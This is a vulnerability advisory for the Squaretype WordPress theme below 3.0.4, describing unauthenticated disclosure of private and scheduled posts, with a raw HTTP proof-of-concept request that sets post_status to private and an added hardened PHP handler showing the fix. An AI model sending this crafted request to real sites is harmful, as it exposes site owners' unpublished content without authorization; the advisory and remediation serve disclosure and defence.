wpvulndb
Emil Kylander Edwartz
WPVDB-ID: 971302FD-4E8B-4C6A-818F-3A42C7FB83EF
History: Oct 11, 2021 - 12:00 a.m.

Squaretype Modern Blog < 3.0.4 - Unauthenticated Private/Schedule Posts Disclosure

2021-10-11 00:00:00
Emil Kylander Edwartz
wpscan.com
5

EPSS: 0.002 (Low)
EPSS Percentile: 53.4%

The theme allows unauthenticated users to manipulate the query_vars used to retrieve the posts displayed by one of its REST endpoints, without any validation. As a result, private and scheduled posts can be retrieved via a crafted request that sets post_status in the supplied query_vars.

PoC

POST /wp-json/csco/v1/more-posts
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 186

action=csco_ajax_load_more&page=1&posts_per_page=10&query_data=%7b%22location%22%3a%22%22%2c%22infinite_load%22%3afalse%2c%22query_vars%22%3a%7b%22post_status%22%3a%20%22private%22%7d%7d
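The root cause is that client-supplied query_vars reach WP_Query unfiltered, so a caller can set post_status (or any other key) and pull posts that are not public. The following is an added illustrative example of a hardened handler for an endpoint of this shape; it is not the Squaretype theme's code. Only the route name (csco/v1/more-posts) and the query_data / query_vars parameter layout are taken from the advisory; the callback name, the allowed-key list and the response format are assumptions.

```php
<?php
// Added example: hardened "load more posts" REST callback (not the theme's code).
// Assumptions: a WordPress install, the route csco/v1/more-posts, and a POST body
// carrying page, posts_per_page and a JSON-encoded query_data with a query_vars map.

add_action( 'rest_api_init', function () {
    register_rest_route( 'csco/v1', '/more-posts', array(
        'methods'             => 'POST',
        'callback'            => 'example_more_posts_hardened',   // hypothetical name
        'permission_callback' => '__return_true',                 // public by design
    ) );
} );

// Keys the client may influence. post_status, post__in, author, post_type and
// everything else not listed here is silently dropped.
const EXAMPLE_ALLOWED_QUERY_VARS = array( 'cat', 'tag', 'orderby', 'order', 's' );

// Reduce an untrusted query_vars map to an allow-listed, type-checked subset.
function example_sanitize_query_vars( $raw ) {
    $clean = array();
    if ( ! is_array( $raw ) ) {
        return $clean;
    }
    foreach ( EXAMPLE_ALLOWED_QUERY_VARS as $key ) {
        if ( ! isset( $raw[ $key ] ) || ! is_scalar( $raw[ $key ] ) ) {
            continue;
        }
        switch ( $key ) {
            case 'cat':
                $clean['cat'] = absint( $raw['cat'] );
                break;
            case 'order':
                $clean['order'] = ( strtoupper( $raw['order'] ) === 'ASC' ) ? 'ASC' : 'DESC';
                break;
            case 'orderby':
                $clean['orderby'] = in_array( $raw['orderby'], array( 'date', 'title' ), true )
                    ? $raw['orderby'] : 'date';
                break;
            default: // 'tag', 's'
                $clean[ $key ] = sanitize_text_field( $raw[ $key ] );
        }
    }
    return $clean;
}

function example_more_posts_hardened( WP_REST_Request $request ) {
    $page           = max( 1, absint( $request->get_param( 'page' ) ) );
    $posts_per_page = min( 50, max( 1, absint( $request->get_param( 'posts_per_page' ) ) ) );

    // query_data arrives URL-encoded JSON, exactly as in the advisory's request body.
    $query_data = json_decode( (string) $request->get_param( 'query_data' ), true );
    $user_vars  = ( is_array( $query_data ) && isset( $query_data['query_vars'] ) )
        ? $query_data['query_vars'] : array();

    $args = example_sanitize_query_vars( $user_vars );

    // Server-controlled values are assigned AFTER the client input so they can
    // never be overridden; forcing post_status to 'publish' is what closes the
    // private/scheduled post disclosure.
    $args['post_type']      = 'post';
    $args['post_status']    = 'publish';
    $args['has_password']   = false;
    $args['paged']          = $page;
    $args['posts_per_page'] = $posts_per_page;

    $query = new WP_Query( $args );
    $items = array();
    foreach ( $query->posts as $post ) {
        $items[] = array(
            'id'    => $post->ID,
            'title' => get_the_title( $post ),
            'link'  => get_permalink( $post ),
        );
    }
    return rest_ensure_response( array(
        'posts'     => $items,
        'max_pages' => (int) $query->max_num_pages,
    ) );
}
```

The ordering in the callback is the important design choice: if defaults are merged underneath user input (for example array_merge( $defaults, $user_vars ) or wp_parse_args( $user_vars, $defaults )), the client's post_status wins and the advisory's request succeeds. Allow-listing keys and then assigning post_status, post_type and the pagination values last makes the outcome independent of whatever the client sends.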

CPE Name   Operator   Version
squaretype lt         3.0.4

